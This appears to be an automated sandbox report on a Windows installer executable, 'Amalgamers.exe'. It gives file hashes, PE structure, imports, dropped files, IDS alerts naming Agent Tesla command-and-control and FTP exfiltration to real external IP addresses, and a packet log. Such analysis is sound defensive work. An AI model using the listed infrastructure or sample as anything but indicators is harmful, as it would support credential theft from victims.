                                      SSDEEP:6144:E6JlraYSCu5Xoyx6DkG2gXz1Q+nNH7BYyEh7Zr5WHS2dOgS:EKcYSLFoyxEkGR9N9Gh7F5WH7M
                                      MD5:D3A1AD4DCC66A97ED5434CB9AFE43C19
                                      SHA1:56C027799460524E096C2A14F9B791480C0E052E
                                      SHA-256:E268FEF1533354A336F10CD2C54B34DD37FA1C7BBEB1BC67BA2EE748F3540775
                                      SHA-512:1E82862724689E47EF56DF069324BD797A660C67590EDE1057F8603876CA52E8AF1C4F215390E2B108BFDA39833C6E79DD5D80D2EFF9F7BAB8B7B9F1444147C6
                                      Malicious:false
                                      Preview:............^............GGGGG......11...............G....y......B....................LL......;......y..........L.{....d...yy.....................e.......Z......u...G.......\......v.....9..........7..................G.rr..............999.......##........=...................................~~~.....xxx....VV..&&&...................0..................e.....................M....................7...................ii............................(...........................................E......................3................................c...x............dddd.~....gg.......qq..ppp.;;;;;;........i..5.......1.ff.......................;;......0........S............................T.................b.......U...........X.^^............p....;;;;.............................k.....wwwwww.+.vv........==.........).......W..oo...................ZZ.P...........................-......LL......................kk...........999..2...................eee.......&....=.^....dd...............................
                                      Process:C:\Users\user\Desktop\Amalgamers.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):241978
                                      Entropy (8bit):1.246588775581002
                                      Encrypted:false
                                      SSDEEP:768:CvIX3g9acDkuE8zXgrmOhShQF8gFuZadsvV97nSx89Ra2VAPKRdimo31v9BzEXmQ:Wuwa6FdB7kyA
                                      MD5:FA6863BE9E976E93018B15628070BF7C
                                      SHA1:7B288424CEC51F8E2EF38519AE59E6B1D901416C
                                      SHA-256:BCF7E7663451AE349B3B8458845CF99E3ED8354D800DD39D5F4BA7A4205BF7A1
                                      SHA-512:CDE30C6176879BE839EC30F06068D756E9536308B6336888EB6A26B06E8D56D8674796C19B559F84A4F0389A39922BAF335D1AD9A388B29315DD84338BD90D03
                                      Malicious:false
                                      Preview:......................i....................D..........................................v...........M.................................................................................................................s.... ............................................................].........o..................................%............9................................................)............l...............J=......C..............................+..................................................................b..............................&.................0............................v.........G..............................................J............................................................~..3....(...................,.....<.....................................9......2.........................................................................................................=......................................................................................i...........
                                      Process:C:\Users\user\Desktop\Amalgamers.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):472128
                                      Entropy (8bit):1.2500192207194354
                                      Encrypted:false
                                      SSDEEP:1536:dpye9Lw5Dl0MYAnajCo6o097EAgUC7lLjs0k:dIxDl0NAn5E0K35G
                                      MD5:7098E71A650191D33BB82D0B4E2DEC25
                                      SHA1:EDDA248F8FDC86D8420FC4BE21EA79DCC27D2CF8
                                      SHA-256:E77F9F89C0D096EF18C9FA5C644B93F028F860DB95E4719E2A891E36BDF72D13
                                      SHA-512:A16CF0CB8AC38E554B7BE7EC04BC067AECD5864183EB960004FFCEAE603A21C0B817EE5D39F43115E8970B23922ECC5F696B4AB9546FA182762132E1EC3D8D0F
                                      Malicious:false
                                      Preview:.....d...............M..............!.......L.................................8.....U.............................................................R........................................................8.............X.....................`.............................E................................T..........H...........................Ek..................................................M.......'.............V.......Y...................................O.......................#.m..X...........................~.................$..:............................."..........................4......5...........d..........................W....|`...............................................w........................................................^.............Z...\.....................6................................................................................................^.."........................V........C........G..S[..................).........................................
                                      Process:C:\Users\user\Desktop\Amalgamers.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):449259
                                      Entropy (8bit):1.2591643282176364
                                      Encrypted:false
                                      SSDEEP:1536:6tLYXkMJYLHxnrm5SOJuf/saTv3cAO3PlJm+nr2/GF4:6t0JYLCXuJv38fi+r2/GF
                                      MD5:DB5B6812D41435A4D58A9A005197324D
                                      SHA1:208BDE38448423C9736331740F1715C573585F9D
                                      SHA-256:26362E1BCB43858D0921B95348DE11948141C662B249CE279DC584CCAB565327
                                      SHA-512:62C0400CA7951AD1E24007D24F6F41CCF7FD2B3EA67CEC220D82CDC52DCBB93FAC8A6CBA7CEF4522190C00DC30DB20F520C9B6666068AC0B09EFFD28D2E7E90A
                                      Malicious:false
                                      Preview:...#...(............................................................_.................................................................................................................7...........................................................................`....U................................|..............V........................[.........~........................;.....#.............-........................................................}.............................2...........f......................................................................'..............d...................................................._.........y.......G<...........}......................................................4.........,............................................x.......................5................Y..............7...1...............................Y...........i................km.......~..................................{...........:....................................................
                                      Process:C:\Users\user\Desktop\Amalgamers.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):220386
                                      Entropy (8bit):1.2494539894139274
                                      Encrypted:false
                                      SSDEEP:768:dk0GCeW7H+LxETH05l7BKcpoHEmE9MSonQpCovaGbNxgEeKhlmaY4IFUyN1ptbGW:+JYmDEFlN1PFInmRpptl
                                      MD5:0BEFCE0893D830815D7995ED3E2F307B
                                      SHA1:4D27BBE8FCAB8FA8B5C30634C8442C3CE883345F
                                      SHA-256:81F8CD084521DD7D248374A9A4551790C0C7EDD2F5A30C2C1A8FBF67CAAA6372
                                      SHA-512:EA721D2D1E54EE8397C2C6C1A14F973F2573E95D1C2DF1B52C3368C0E7364AA719D1F39FF635AAF206BA0A1860B3B2B6864068BF37931ADC8D16D81D1F93EBD9
                                      Malicious:false
                                      Preview:..............................N.......................R............................................;.............................._........................l..........U................................................h....................................x...............I............................................................................. ................n..............................................M.........................?....................x..........u.................................................................................................Q....k..........................................'.................................................j...................................................................................................w.......C...........................................................................................................................h.%....................................a.........................................Q......................
                                      Process:C:\Users\user\Desktop\Amalgamers.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):272334
                                      Entropy (8bit):1.2494878642055454
                                      Encrypted:false
                                      SSDEEP:768:vkFEzMeu6cxURq5nyP2N2oMCCqBHjCaTwS6nNrUlsP8PogoJOhQuKOXM7C6wTurp:ewZ2N2IMrUhhd8GE8Qmet
                                      MD5:A182D70079F2B7624FEC8D768657838F
                                      SHA1:C6BE4431D6A7C954080B8609C96BBAFDF6FB3FA9
                                      SHA-256:4C7BEF24AFE77BD9FA815C592BAE7A2C89825B2D4C972D45D4C1154D325AB906
                                      SHA-512:258A37897E2BC939766FC109974C13B0AE814B3C5935913B728FC9E44AEA25722C2E5496CA7B2EAAEA68459450B8EA91B97924D92B7398FD6295839C3DF3D46F
                                      Malicious:false
                                      Preview:.....................................b..........................................9................................................................D.............r............O..........o.....3....N.......w........................................................J...2..................N.............1...............H..l7.....(...7.............................A..................I............................................................................+......H............................................G.......................(.....................Z.................................!.........A.....................................................................................................(..........a........................................L...........................>................f.............................................................F.................................................t.........................................l........q...........5........{..`............4......
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                      Entropy (8bit):7.854546227436502
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:Amalgamers.exe
                                      File size:942'432 bytes
                                      MD5:e2a5b947ac8266e79cc0c9faff051849
                                      SHA1:a128aac0de4bbf879f7df28526e6b59a30fb82b1
                                      SHA256:b5276a247be390e58bbb52535b1437f1aae13ca70930ce885c8aad870ba01053
                                      SHA512:e44b6dc1e3043c5aa4e030180b071c8e6b007672feacf9a6044a656de55db499c9f34c3ed9a1d0553deddd6fb1c241226f70348b178326292dfdb281ba6edde5
                                      SSDEEP:24576:IyG1qpfQfJtOutBz+sTrMEnPaS9Jv8MPtquNs:D8qeRg8BzPMEyS3LPfNs
                                      TLSH:951523E2FE54D5F5C5B652B08B77AA98CE12ADA6654129332603338F397B101C71F38B
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F...v...F...@...F.Rich..F.........................PE..L...)..\.................d...|.....
                                      Icon Hash:4d2e36276b2c2f1e
                                      Entrypoint:0x40320c
                                      Entrypoint Section:.text
                                      Digitally signed:true
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x5C157F29 [Sat Dec 15 22:24:41 2018 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:3abe302b6d9a1256e6a915429af4ffd2
                                      Signature Valid:false
                                      Signature Issuer:CN=Allotypies, O=Allotypies, L=Pengorffwysfa, C=GB
                                      Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                      Error Number:-2146762487
                                      Not Before, Not After
                                      • 09/01/2024 07:17:36 08/01/2027 07:17:36
                                      Subject Chain
                                      • CN=Allotypies, O=Allotypies, L=Pengorffwysfa, C=GB
                                      Version:3
                                      Thumbprint MD5:9DC9AC0C4F10BA13B19BE7DA0B467514
                                      Thumbprint SHA-1:E32C0D98B51DE07D43668B668DFD6299419466CE
                                      Thumbprint SHA-256:CC4F1C667AF26C71080FA4E10FA6DA45F61C0937598A075F7DD8E11287032457
                                      Serial:715987EBF17283939D8427A933D97793F1B45E95
                                      Instruction
                                      sub esp, 00000184h
                                      push ebx
                                      push esi
                                      push edi
                                      xor ebx, ebx
                                      push 00008001h
                                      mov dword ptr [esp+18h], ebx
                                      mov dword ptr [esp+10h], 0040A198h
                                      mov dword ptr [esp+20h], ebx
                                      mov byte ptr [esp+14h], 00000020h
                                      call dword ptr [004080A0h]
                                      call dword ptr [0040809Ch]
                                      and eax, BFFFFFFFh
                                      cmp ax, 00000006h
                                      mov dword ptr [0042F40Ch], eax
                                      je 00007FEA2C4FB453h
                                      push ebx
                                      call 00007FEA2C4FE52Ah
                                      cmp eax, ebx
                                      je 00007FEA2C4FB449h
                                      push 00000C00h
                                      call eax
                                      mov esi, 00408298h
                                      push esi
                                      call 00007FEA2C4FE4A6h
                                      push esi
                                      call dword ptr [00408098h]
                                      lea esi, dword ptr [esi+eax+01h]
                                      cmp byte ptr [esi], bl
                                      jne 00007FEA2C4FB42Dh
                                      push 0000000Ah
                                      call 00007FEA2C4FE4FEh
                                      push 00000008h
                                      call 00007FEA2C4FE4F7h
                                      push 00000006h
                                      mov dword ptr [0042F404h], eax
                                      call 00007FEA2C4FE4EBh
                                      cmp eax, ebx
                                      je 00007FEA2C4FB451h
                                      push 0000001Eh
                                      call eax
                                      test eax, eax
                                      je 00007FEA2C4FB449h
                                      or byte ptr [0042F40Fh], 00000040h
                                      push ebp
                                      call dword ptr [00408044h]
                                      push ebx
                                      call dword ptr [00408288h]
                                      mov dword ptr [0042F4D8h], eax
                                      push ebx
                                      lea eax, dword ptr [esp+38h]
                                      push 00000160h
                                      push eax
                                      push ebx
                                      push 00429830h
                                      call dword ptr [00408178h]
                                      push 0040A188h
                                      Programming Language:
                                      • [EXP] VC++ 6.0 SP5 build 8804
                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x853c0xa0.rdata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x400000x11488.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0xe58500x910
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x80000x298.rdata
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x10000x628f0x64006cd58568c5809fdd0c7dcb006e4acdbaFalse0.6700390625data6.442207080714446IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rdata0x80000x135c0x1400b27ba0846d4bbf5bff764f5a5c418a97False0.4611328125data5.240043476337556IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .data0xa0000x255180x60012c02de2bdc517e2722ceeb84aff8b34False0.455078125data4.04938010159809IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .ndata0x300000x100000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .rsrc0x400000x114880x11600b9be6c5b4569a43951d869c84801fc0aFalse0.29055193345323743data3.8823683070253874IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      RT_ICON0x402380x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.2831539098544895
                                      RT_DIALOG0x50a600x144dataEnglishUnited States0.5216049382716049
                                      RT_DIALOG0x50ba80x120dataEnglishUnited States0.5104166666666666
                                      RT_DIALOG0x50cc80x11cdataEnglishUnited States0.6056338028169014
                                      RT_DIALOG0x50de80xc4dataEnglishUnited States0.5918367346938775
                                      RT_DIALOG0x50eb00x60dataEnglishUnited States0.7291666666666666
                                      RT_GROUP_ICON0x50f100x14dataEnglishUnited States1.15
                                      RT_VERSION0x50f280x220dataEnglishUnited States0.5202205882352942
                                      RT_MANIFEST0x511480x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                      DLLImport
                                      KERNEL32.dllGetTempPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, Sleep, GetTickCount, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GetWindowsDirectoryA, SetCurrentDirectoryA, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, CompareFileTime, SetFileAttributesA, GetFileAttributesA, GetShortPathNameA, MoveFileA, GetFullPathNameA, SetFileTime, SearchPathA, CloseHandle, lstrcmpiA, CreateThread, GlobalLock, lstrcmpA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GlobalAlloc, GlobalFree, ExpandEnvironmentStringsA
                                      USER32.dllScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
                                      GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                      SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExA, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA
                                      ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExA, RegOpenKeyExA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, RegEnumValueA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                      COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                      ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                      Language of compilation systemCountry where language is spokenMap
                                      EnglishUnited States
                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                      2024-11-09T20:46:13.669638+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.245.163.56443192.168.2.449730TCP
                                      2024-11-09T20:46:52.578190+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.245.163.56443192.168.2.449736TCP
                                      2024-11-09T20:47:08.054416+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.449797185.36.171.1780TCP
                                      2024-11-09T20:47:13.762981+01002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.44981986.107.36.9321TCP
                                      2024-11-09T20:47:14.515003+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.44983586.107.36.9335643TCP
                                      2024-11-09T20:47:14.520299+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.44983586.107.36.9335643TCP
                                      TimestampSource PortDest PortSource IPDest IP
                                      Nov 9, 2024 20:47:07.011639118 CET4979780192.168.2.4185.36.171.17
                                      Nov 9, 2024 20:47:07.016812086 CET8049797185.36.171.17192.168.2.4
                                      Nov 9, 2024 20:47:07.016891003 CET4979780192.168.2.4185.36.171.17
                                      Nov 9, 2024 20:47:07.016972065 CET4979780192.168.2.4185.36.171.17
                                      Nov 9, 2024 20:47:07.021724939 CET8049797185.36.171.17192.168.2.4
                                      Nov 9, 2024 20:47:08.054354906 CET8049797185.36.171.17192.168.2.4
                                      Nov 9, 2024 20:47:08.054415941 CET4979780192.168.2.4185.36.171.17
                                      Nov 9, 2024 20:47:08.058527946 CET49803443192.168.2.4185.36.171.17
                                      Nov 9, 2024 20:47:08.058557987 CET44349803185.36.171.17192.168.2.4
                                      Nov 9, 2024 20:47:08.058617115 CET49803443192.168.2.4185.36.171.17
                                      Nov 9, 2024 20:47:08.071583033 CET49803443192.168.2.4185.36.171.17
                                      Nov 9, 2024 20:47:08.071602106 CET44349803185.36.171.17192.168.2.4
                                      Nov 9, 2024 20:47:09.402777910 CET44349803185.36.171.17192.168.2.4
                                      Nov 9, 2024 20:47:09.402870893 CET49803443192.168.2.4185.36.171.17
                                      Nov 9, 2024 20:47:09.493004084 CET49803443192.168.2.4185.36.171.17
                                      Nov 9, 2024 20:47:09.493022919 CET44349803185.36.171.17192.168.2.4
                                      Nov 9, 2024 20:47:09.493247986 CET44349803185.36.171.17192.168.2.4
                                      Nov 9, 2024 20:47:09.493374109 CET49803443192.168.2.4185.36.171.17
                                      Nov 9, 2024 20:47:09.546700001 CET49803443192.168.2.4185.36.171.17
                                      Nov 9, 2024 20:47:09.587331057 CET44349803185.36.171.17192.168.2.4
                                      Nov 9, 2024 20:47:09.799273968 CET44349803185.36.171.17192.168.2.4
                                      Nov 9, 2024 20:47:09.799341917 CET49803443192.168.2.4185.36.171.17
                                      Nov 9, 2024 20:47:09.799350023 CET44349803185.36.171.17192.168.2.4
                                      Nov 9, 2024 20:47:09.799391985 CET49803443192.168.2.4185.36.171.17
                                      Nov 9, 2024 20:47:09.930088997 CET44349803185.36.171.17192.168.2.4
                                      Nov 9, 2024 20:47:09.930105925 CET44349803185.36.171.17192.168.2.4
                                      Nov 9, 2024 20:47:09.930149078 CET44349803185.36.171.17192.168.2.4
                                      Nov 9, 2024 20:47:09.930174112 CET49803443192.168.2.4185.36.171.17
                                      Nov 9, 2024 20:47:09.930186033 CET44349803185.36.171.17192.168.2.4
                                      Nov 9, 2024 20:47:09.930213928 CET49803443192.168.2.4185.36.171.17
                                      Nov 9, 2024 20:47:09.930233955 CET49803443192.168.2.4185.36.171.17
                                      Nov 9, 2024 20:47:09.931895018 CET44349803185.36.171.17192.168.2.4
                                      Nov 9, 2024 20:47:09.931912899 CET44349803185.36.171.17192.168.2.4
                                      Nov 9, 2024 20:47:09.931968927 CET49803443192.168.2.4185.36.171.17
                                      Nov 9, 2024 20:47:09.931977034 CET44349803185.36.171.17192.168.2.4
                                      Nov 9, 2024 20:47:09.932018042 CET49803443192.168.2.4185.36.171.17
                                      Nov 9, 2024 20:47:10.060064077 CET44349803185.36.171.17192.168.2.4
                                      Nov 9, 2024 20:47:10.060084105 CET44349803185.36.171.17192.168.2.4
                                      Nov 9, 2024 20:47:10.060198069 CET49803443192.168.2.4185.36.171.17
                                      Nov 9, 2024 20:47:10.060210943 CET44349803185.36.171.17192.168.2.4
                                      Nov 9, 2024 20:47:10.060256958 CET49803443192.168.2.4185.36.171.17
                                      Nov 9, 2024 20:47:10.060972929 CET44349803185.36.171.17192.168.2.4
                                      Nov 9, 2024 20:47:10.060985088 CET44349803185.36.171.17192.168.2.4
                                      Nov 9, 2024 20:47:10.061043978 CET49803443192.168.2.4185.36.171.17
                                      Nov 9, 2024 20:47:10.061049938 CET44349803185.36.171.17192.168.2.4
                                      Nov 9, 2024 20:47:10.061100960 CET49803443192.168.2.4185.36.171.17
                                      Nov 9, 2024 20:47:10.062762976 CET44349803185.36.171.17192.168.2.4
                                      Nov 9, 2024 20:47:10.062779903 CET44349803185.36.171.17192.168.2.4
                                      Nov 9, 2024 20:47:10.062843084 CET49803443192.168.2.4185.36.171.17
                                      Nov 9, 2024 20:47:10.062849045 CET44349803185.36.171.17192.168.2.4
                                      Nov 9, 2024 20:47:10.062886953 CET49803443192.168.2.4185.36.171.17
                                      Nov 9, 2024 20:47:10.176728964 CET44349803185.36.171.17192.168.2.4
                                      Nov 9, 2024 20:47:10.176745892 CET44349803185.36.171.17192.168.2.4
                                      Nov 9, 2024 20:47:10.176820993 CET49803443192.168.2.4185.36.171.17
                                      Nov 9, 2024 20:47:10.176830053 CET44349803185.36.171.17192.168.2.4
                                      Nov 9, 2024 20:47:10.176876068 CET49803443192.168.2.4185.36.171.17
                                      Nov 9, 2024 20:47:10.190601110 CET44349803185.36.171.17192.168.2.4
                                      Nov 9, 2024 20:47:10.190615892 CET44349803185.36.171.17192.168.2.4
                                      Nov 9, 2024 20:47:10.190671921 CET49803443192.168.2.4185.36.171.17
                                      Nov 9, 2024 20:47:10.190676928 CET44349803185.36.171.17192.168.2.4
                                      Nov 9, 2024 20:47:10.190722942 CET49803443192.168.2.4185.36.171.17
                                      Nov 9, 2024 20:47:10.191792011 CET44349803185.36.171.17192.168.2.4
                                      Nov 9, 2024 20:47:10.191807032 CET44349803185.36.171.17192.168.2.4
                                      Nov 9, 2024 20:47:10.191867113 CET49803443192.168.2.4185.36.171.17
                                      Nov 9, 2024 20:47:10.191873074 CET44349803185.36.171.17192.168.2.4
                                      Nov 9, 2024 20:47:10.191915989 CET49803443192.168.2.4185.36.171.17
                                      Nov 9, 2024 20:47:10.193341017 CET44349803185.36.171.17192.168.2.4
                                      Nov 9, 2024 20:47:10.193355083 CET44349803185.36.171.17192.168.2.4
                                      Nov 9, 2024 20:47:10.193408966 CET49803443192.168.2.4185.36.171.17
                                      Nov 9, 2024 20:47:10.193413973 CET44349803185.36.171.17192.168.2.4
                                      Nov 9, 2024 20:47:10.193435907 CET49803443192.168.2.4185.36.171.17
                                      Nov 9, 2024 20:47:10.193450928 CET49803443192.168.2.4185.36.171.17
                                      Nov 9, 2024 20:47:10.194552898 CET44349803185.36.171.17192.168.2.4
                                      Nov 9, 2024 20:47:10.194566011 CET44349803185.36.171.17192.168.2.4
                                      Nov 9, 2024 20:47:10.194602013 CET49803443192.168.2.4185.36.171.17
                                      Nov 9, 2024 20:47:10.194607019 CET44349803185.36.171.17192.168.2.4
                                      Nov 9, 2024 20:47:10.194641113 CET49803443192.168.2.4185.36.171.17
                                      Nov 9, 2024 20:47:10.194663048 CET49803443192.168.2.4185.36.171.17
                                      Nov 9, 2024 20:47:10.195895910 CET44349803185.36.171.17192.168.2.4
                                      Nov 9, 2024 20:47:10.195909977 CET44349803185.36.171.17192.168.2.4
                                      Nov 9, 2024 20:47:10.195966005 CET49803443192.168.2.4185.36.171.17
                                      Nov 9, 2024 20:47:10.195971966 CET44349803185.36.171.17192.168.2.4
                                      Nov 9, 2024 20:47:10.196008921 CET49803443192.168.2.4185.36.171.17
                                      Nov 9, 2024 20:47:10.197513103 CET44349803185.36.171.17192.168.2.4
                                      Nov 9, 2024 20:47:10.197526932 CET44349803185.36.171.17192.168.2.4
                                      Nov 9, 2024 20:47:10.197577953 CET49803443192.168.2.4185.36.171.17
                                      Nov 9, 2024 20:47:10.197583914 CET44349803185.36.171.17192.168.2.4
                                      Nov 9, 2024 20:47:10.197619915 CET49803443192.168.2.4185.36.171.17
                                      Nov 9, 2024 20:47:10.293560982 CET44349803185.36.171.17192.168.2.4
                                      Nov 9, 2024 20:47:10.293576002 CET44349803185.36.171.17192.168.2.4
                                      Nov 9, 2024 20:47:10.293667078 CET49803443192.168.2.4185.36.171.17
                                      Nov 9, 2024 20:47:10.293675900 CET44349803185.36.171.17192.168.2.4
                                      Nov 9, 2024 20:47:10.293719053 CET49803443192.168.2.4185.36.171.17
                                      Nov 9, 2024 20:47:10.320646048 CET44349803185.36.171.17192.168.2.4
